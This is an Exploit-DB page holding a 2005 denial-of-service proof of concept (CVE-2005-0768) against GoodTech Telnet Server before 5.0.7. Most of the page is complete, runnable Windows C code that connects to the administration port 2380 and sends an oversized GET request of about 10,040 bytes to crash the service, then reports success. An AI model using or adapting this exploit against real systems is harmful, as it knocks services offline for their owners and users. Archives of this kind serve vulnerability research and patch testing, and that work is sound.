GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash

EDB-ID:

882

CVE:

2005-0768

EDB Verified:

Author:

Komrade

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2005-03-15

Vulnerable App: 
/******************************************************************************************

	GoodTech Telnet Server Buffer Overflow Crash POC
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
        on a Windows XP Professional sp2 operating system.

	This exploit connects to the Administration server of GoodTech Telnet Server
	(default port 2380) and sends a very long string (10040 bytes).
	After the exploit is sent the Telnet Server will crash, trying to access
	to a bad memory address: 0xDEADCODE.

	Usage: gtscrash.exe "IP address"

	Options:
	"IP address"	The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

	SOCKET sock;
	struct sockaddr_in sock_addr;
	WSADATA data;
	WORD p;
	p=MAKEWORD(2,0);
	WSAStartup(p,&data);
	int i, n, err;
	unsigned char *mex;
	char risp[4096];

	printf("------------------------------------------------------------------------------\r\n");
	printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
	printf("\t\t\tcreated by Komrade\r\n\r\n");

	printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
	printf("\t\tweb: http://unsecure.altervista.org\r\n");
	printf("------------------------------------------------------------------------------\r\n\r\n");


	if (argc < 2){
		printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
		printf("Options:\r\n");
		printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
		exit(0);
	}

	mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(2380); /* Administration web server port */
	sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

	err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
	if(err<0){
		printf("Unable to connect() to %s\n", argv[1]);
		exit(-1);
	}

	strcpy (mex, "GET /");

	for(i = strlen(mex); i < 10032; i++)
		mex[i]= 'a';
	mex[i]=0;

	strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
	strcat(mex, "\r\n\r\n");

	printf("Sending %d bytes.....\n\n", strlen(mex));
	n=send(sock, mex , strlen(mex), 0);

	n=recv(sock, risp, sizeof(risp), 0);
	if (n < 0)
		printf("GoodTech Telnet Server succesfully crashed!!\n");
	else{
		risp[n]=0;
		printf("%s\n", risp);
	}

	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-03-15]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services